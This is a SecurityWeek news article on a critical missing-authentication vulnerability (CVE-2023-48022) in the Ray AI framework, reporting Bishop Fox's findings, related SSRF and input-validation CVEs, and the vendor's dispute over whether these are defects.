Connect with us

Hi, what are you looking for?

SecurityWeekSecurityWeek

Artificial Intelligence

Critical Vulnerability Found in Ray AI Framework 

A critical issue in open source AI framework Ray could provide attackers with operating system access to all nodes.

A critical vulnerability in Ray, an open source compute framework for AI, could allow unauthorized access to all nodes, cybersecurity firm Bishop Fox warns.

Tracked as CVE-2023-48022, the bug exists because Ray does not properly enforce authentication on at least two of its components, namely the dashboard and client.

A remote attacker can abuse this issue to submit or delete jobs without authentication. Furthermore, the attacker could retrieve sensitive information and execute arbitrary code, Bishop Fox says.

“The vulnerability could be exploited to obtain operating system access to all nodes in the Ray cluster or attempt to retrieve Ray EC2 instance credentials (in a typical AWS cloud install),” the cybersecurity firm notes.

CVE-2023-48022 is rooted in the fact that, in its default configuration, Ray does not enforce authentication, and does not appear to support any type of authorization model, although an optional mutual TLS authentication mode is described in the framework’s documentation.

“In other words, even if a Ray administrator explicitly enabled TLS authentication, they would be unable to grant users different permissions, such as read-only access to the Ray dashboard,” Bishop Fox says.

According to the cybersecurity firm, attackers could exploit CVE-2023-48022 via the job submission API, by submitting arbitrary operating system commands.

Ray’s lack of authentication leads to other security vulnerabilities, including issues that were recently disclosed by Protect AI, which manages Huntr, the bug bounty platform for AI and ML.

Advertisement. Scroll to continue reading.

Bishop Fox says it independently identified two of these issues and reported them to Ray’s maintainers (Anyscale) around the same time as Protect AI.

“However, the reports were closed based on Anyscale’s position that unauthenticated remote code execution is intentional, and therefore should not be considered a vulnerability,” the cybersecurity firm says.

Furthermore, the company says, the Ray jobs Python SDK can be used for unauthenticated, remote code execution, by crafting a malicious script, using the Ray API for task submission. The Ray client API can also be abused for unauthenticated remote code execution.

Bishop Fox draws attention to other critical-severity vulnerabilities in Ray as well, including a server-side request forgery (SSRF) bug (CVE-2023-48023) and an insecure input validation flaw (CVE-2023-6021) that Protect AI reported to the vendor this summer.

At least some of these issues, the cybersecurity firm notes, remain unpatched, as the vendor either does not recognize them as security defects or does not want to address them.

Update: The CVE IDs for the missing authentication and SSRF vulnerabilities have been corrected after learning that Bishop Fox swapped them in their initial post.

Related: OpenAI Patches Account Takeover Vulnerabilities in ChatGPT

Related: US, UK Cybersecurity Agencies Publish AI Development Guidance

Related: CISA Outlines AI-Related Cybersecurity Efforts

Written By

Ionut Arghire is an international correspondent for SecurityWeek.

Trending

Daily Briefing Newsletter

Subscribe to the SecurityWeek Email Briefing to stay informed on the latest threats, trends, and technology, along with insightful columns from industry experts.

Join the session as we discuss the challenges and best practices for cybersecurity leaders managing cloud identities.

Register

SecurityWeek’s Ransomware Resilience and Recovery Summit helps businesses to plan, prepare, and recover from a ransomware incident.

Register

People on the Move

Mike Dube has joined cloud security company Aqua Security as CRO.

Cody Barrow has been appointed as CEO of threat intelligence company EclecticIQ.

Shay Mowlem has been named CMO of runtime and application security company Contrast Security.

More People On The Move

Expert Insights

Related Content

Artificial Intelligence

The CRYSTALS-Kyber public-key encryption and key encapsulation mechanism recommended by NIST for post-quantum cryptography has been broken using AI combined with side channel attacks.

Artificial Intelligence

The release of OpenAI’s ChatGPT in late 2022 has demonstrated the potential of AI for both good and bad.

Artificial Intelligence

ChatGPT is increasingly integrated into cybersecurity products and services as the industry is testing its capabilities and limitations.

Artificial Intelligence

The degree of danger that may be introduced when adversaries start to use AI as an effective weapon of attack rather than a tool...

Artificial Intelligence

Two of humanity’s greatest drivers, greed and curiosity, will push AI development forward. Our only hope is that we can control it.

Artificial Intelligence

Microsoft and Mitre release Arsenal plugin to help cybersecurity professionals emulate attacks on machine learning (ML) systems.

Application Security

Thinking through the good, the bad, and the ugly now is a process that affords us “the negative focus to survive, but a positive...

Artificial Intelligence

Exposed data includes backup of employees workstations, secrets, private keys, passwords, and over 30,000 internal Microsoft Teams messages.